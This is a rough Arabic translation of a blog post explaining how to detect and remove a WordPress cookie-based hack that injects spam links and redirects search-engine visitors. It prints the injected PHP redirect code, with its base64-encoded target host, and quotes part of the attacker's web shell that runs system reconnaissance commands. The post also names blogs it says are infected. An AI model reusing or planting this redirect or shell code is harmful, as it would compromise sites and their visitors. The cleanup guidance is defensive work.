في الشهر الماضي ، تلقينا تحذيرات من فيروس في المدونة من بعض الزوار. في البداية تجاهلت التحذيرات ، لأنني حصلت على مكافحة فيروسات جيدة (Kaspersky لعام 2009) وعلى الرغم من أنني كنت في المدونة لفترة طويلة ، إلا أنني لم أتلق أبدًا تنبيه الفيروس (.. رأيت شيئًا مشبوهًا ، والذي اختفى في أول تحديث. أخيرًا ...).
ببطء ، بدأت ببطء في الظهور اختلافات كبيرة من حركة الزوار، وبعد ذلك انخفضت حركة المرور في الآونة الأخيرة باستمرار وبدأت أكثر فأكثر في إخباري بذلك Stealthsettings.com إنها فيروسات. بالأمس تلقيت من شخص ما لقطة شاشة عندما منعت مكافحة الفيروسات أ السيناريو من stealthsettings.com:Trojan-clicker.html.iframe.gr. لقد كان مقنعًا تمامًا بالنسبة لي أن أسعى لي في جميع المصادر. كانت الفكرة الأولى التي تتبادر إلى الذهن هي القيام بذلك يرقي في الإصدار الأخير من وورد (2.5.1) ، ولكن ليس قبل حذف جميع ملفات البرنامج النصي القديم ووردبريس والقيام النسخ الاحتياطي في قاعدة البيانات. هذا الإجراء لم يعط أي نتيجة وربما كان سيستغرق وقتًا طويلاً لإعطائي الأدغال حيث بوب يوجين في مناقشة القهوة ، وجدها رابط على Google وسيكون من الجيد رؤيته.
myDigitAllife.info ، نشرت مقالة مع العنوان: "WordPress Hack: استرداد وإصلاح محرك البحث ومحرك البحث أو عدم إعادة توجيه حركة مرور ملف تعريف الارتباط إلى ذوي الاحتياج الخاص بك"، ما هي نهاية السلك الذي احتاجه.
إنه عن أ يستغل بواسطة WordPress على أساس ملف تعريف الارتباط، وهو في رأيي معقد للغاية ومصنع ككتاب. ذكي بما يكفي لجعل ملف حقن SQL في قاعدة بيانات المدونةو لإنشاء مستخدم غير مرئي إلى تسجيل روتيني بسيط في لوحة القيادة->المستخدمونو للتحقق من مديري الخادم والملفات "قابلة للكتابة" (الذين لديهم chmod 777) ، للبحث عن ينفذ الملفات مع امتيازات المجموعة أو حتى الجذر. لا أعرف ما هو اسم الاستغلال وأرى أن هناك عدد قليل من المقالات المكتوبة حول هذا الموضوع ، على الرغم من أن هناك العديد من المدونات المصابة ، بما في ذلك من رومانيا. حسنًا ... سأحاول أن أحاول شرح العموميات حول هذا الفيروس.
ماذا يفعل الفيروس؟
بادئ ذي بدء ، يدرج في مصادر الصفحات على المدونات ، والروابط غير المرئية للزوار ولكن مرئية وقابلة للفهرسة لمحركات البحث ، وخاصة Google. بهذه الطريقة ترتيب صفحة النقل إلى المواقع التي أشار إليها المهاجم. ثانياً ، يتم إدخال واحد آخر رمز إعادة التوجيه عنوان URL ، للزائرين القادمين من Google ، Live ، Yahoo ، ... أو من قارئ RSS وليس لديهم الموقع في ملف تعريف الارتباط. و مكافحة الفيروسات يكتشف هذا إعادة التوجيه كما Trojan-Clicker.html.
أعراض:
الانخفاض الهائل في حركة الزوار، خاصة على المدونات التي يأتي فيها معظم الزوار من Google.
تعريف: (من هنا المشكلة معقدة بالنسبة لأولئك الذين لا يعرفون مقدار phpmyadmin و php و linux)
ال. حذر !!! أولاً قم بعمل نسخة احتياطية في قاعدة البيانات !!!
1. تحقق من الحصول على مصادر الملفات index.phpو header.phpو تذييل، من موضوع المدونة ومعرفة ما إذا كان هناك رمز يستخدم التشفير BASE64 أم أنه يحتوي على "if ($ ser ==" 1؟ && siefof ($ _ cookie) == 0) "forma:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... أو شيء مشابه. حذف هذا الرمز!
انقر فوق PE تخيل ...
في لقطة الشاشة أعلاه ، اخترت من الخطأ و ""<؟ php get_header () ؛ ؟>"يجب أن يبقى هذا الرمز.
2. الاستخدام phpmyadmin وانتقل إلى قاعدة البيانات إلى الجدول WP_USERS، أين يمكنك التحقق مما إذا كان هناك مستخدم مجهول ، تم إنشاؤه في تاريخ 00: 00: 00 0000-00-00 (من الممكن في هذا المجال user_login لكتابة "WordPress". لاحظ معرف هذا المستخدم (حقل المعرف) ثم امسحه.
انقر فوق PE تخيل ...
*واحد على الخط الأخضر ، يجب حذفه والاحتفاظ به. في قضيته نعسان، كان معرف = 8 .
3. اذهب إلى الطاولة wp_usermeta، حيث لديك تحديد موقع أنت يمسح الخطوط المتعلقة بالمعرف (حيث في الحقل user_id تظهر قيمة المعرف المحذوف).
4. في الجدول wp_option، ادخل Active_plugins وترى المكون الإضافي الذي يتم تنشيطه. يمكن أن تستخدم النهائيات مثل _old.igeff ، _old.pnggg ، _old.jpeg ، _new.php.piff، إلخ. مجموعات من امتدادات الصور الزائفة مع _old و _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'امسح هذا البرنامج المساعد ، ثم انتقل إلى المدونة -> لوحة القيادة -> الإضافات ، حيث تقوم بتعطيل وتنشيط البرنامج المساعد.
انقر على الصورة ، انظر كيف يظهر ملف الفيروس في Active_plugins.
اتبع المسار الموجود على FTP أو SSH ، المشار إليه في Assets_plugins وحذف الملف على الخادم.
5. أيضا في phpmyadmin ، في الجدول wp_optionوابحث وحذف الصف الذي يحتوي على "rss_f541b3abd05e7962fcab37737f40fad8"والصف"internal_links_cache ".
في internal_links_cache ، يتم وضع روابط البريد العشوائي التي تظهر في المدونة وواحدة Google AdSenseمن المتسلل.
6. الموصى بها تغيير كلمة المرور من تسجيل الدخول إلى المدونة و SA التخلص من جميع المستخدمين المشبوهة. قم بالترقية إلى أحدث إصدار من WordPress وقم بتعيين المدونة للتوقف عن تسجيل مستخدمين جدد. لا توجد خسارة ... يمكنهم التعليق و unlog.
حاولت أعلاه أن أشرح كم ، ما الذي يجب القيام به في مثل هذا الموقف ، لتنظيف مدونة هذا الفيروس. المشكلة أكثر خطورة مما يبدو ولا يتم حلها بأي حال من الأحوال لأنها تستخدم ثغرات الأمن من خادم الويب المضيف ، الذي توجد عليه المدونة.
كمقياس أمان أول لديه إمكانية الوصول إليه SSH، للقيام ببعض الشيكات على الخادم لمعرفة ما إذا كان هناك المزيد من الملفات مثل * _old * و * _new. * مع النهايات.سوف ، .jpeg ، .pngg ، .jpgg. يجب حذف هذه الملفات. إذا قمنا بإعادة تسمية ملف ، على سبيل المثال top_right_old.giff في top_right_old.php، نرى أنه في الملف هو بالضبط رمز خادم الاستغلال.
بعض المؤشرات المفيدة للتحقق من الخادم وتنظيفه وتأمينه. (عبر SSH)
1. CD /TMP وتحقق مما إذا كانت هناك مجلدات مثل TMPVFLMA أو مجموعات أخرى من الأسماء المماثلة وحذفها. انظر في لقطة الشاشة أدناه ، اثنين من المجلدات لي:
RM –rf numefolder
2. تحقق والقضاء (تغيير CHMOD) قدر الإمكان المجلدات مع السمات Chmod 777
ابحث عن جميع الملفات القابلة للكتابة في DIR الحالية: يجد . -type f -perm -2 -ls
ابحث عن جميع الدلائل القابلة للكتابة في دير الحالية: يجد . -type d -perm -2 -ls
ابحث عن جميع الدلائل والملفات القابلة للكتابة في DIR الحالية: يجد . -Perm -2 -ls
3. ابحث عن الملفات المشبوهة على الخادم.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4 ، حذر !!! للملفات التي ضبطت البت جنوب و تزلج. تنفذ هذه الملفات بامتيازات المستخدم (المجموعة) أو الجذر ، وليس مع تلك الخاصة بالمستخدم الذي ينفذ الملف. يمكن أن تؤدي هذه الملفات إلى حل وسط للجذر ، إذا كانت هناك مشاكل أمان. إذا كنت لا تستخدم الملفات مع Bits Suid و SGID ، فانتقل "chmod 0 " عليها أو قم بإلغاء تثبيت الحزمة التي تحتوي عليها.
يحتوي الاستغلال على مكان ما في المصدر ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}... في الأساس بهذه الطريقة يجد السلالات في الأمن. المنافذ المفتوحة ، المديرين "القابلة للكتابة" وتنفيذ الملفات مع امتيازات المجموعة / الجذر.
أعود بالتفاصيل ...
بعض المدونات المصابة: www.blegoo.com ، www.visurat.ro ،
fulgerica.com ، denisuca.com ، www.ecostin.com ،
www.razvanmatasel.ro ،
blog.hrmarket.ro ، www.nitza.ro ،
motociclete.motomag.ro ،
emi.brainient.com ، www.picsel.ro ،
www.mihaidragan.ro/kindablog/ ،
Krumel.seo-point.com ، www.itex.ro/blog ،
www.radiology.ro ،
www.dipse.ro/ionut/ ،
www.vinul.ro/blog/ ، www.damaideparte.ro ،
Dragos.Roua.ro ، www.artistul.ro/blog/ ،
www.mirabilismedia.ro/blog ، blog.einvest.ro
... والقائمة يمكن أن تستمر ... كثيرا.
يمكنك التحقق مما إذا كانت المدونة هي فيروس ، باستخدام محرك بحث Google. ينسخ & لصق:
الموقع: www.blegoo.com شراء
ليالي سعيدة وزيادة إلى الوظيفة ؛) قريبا أعتقد أن يوجين سيأتي ، premiebible.imprevizable.com.
BRB :)
في: الانتباه! إن تغيير موضوع WordPress أو الترقية إلى WordPress 2.5.1 ، ليس حلاً للتخلص من هذا الفيروس.
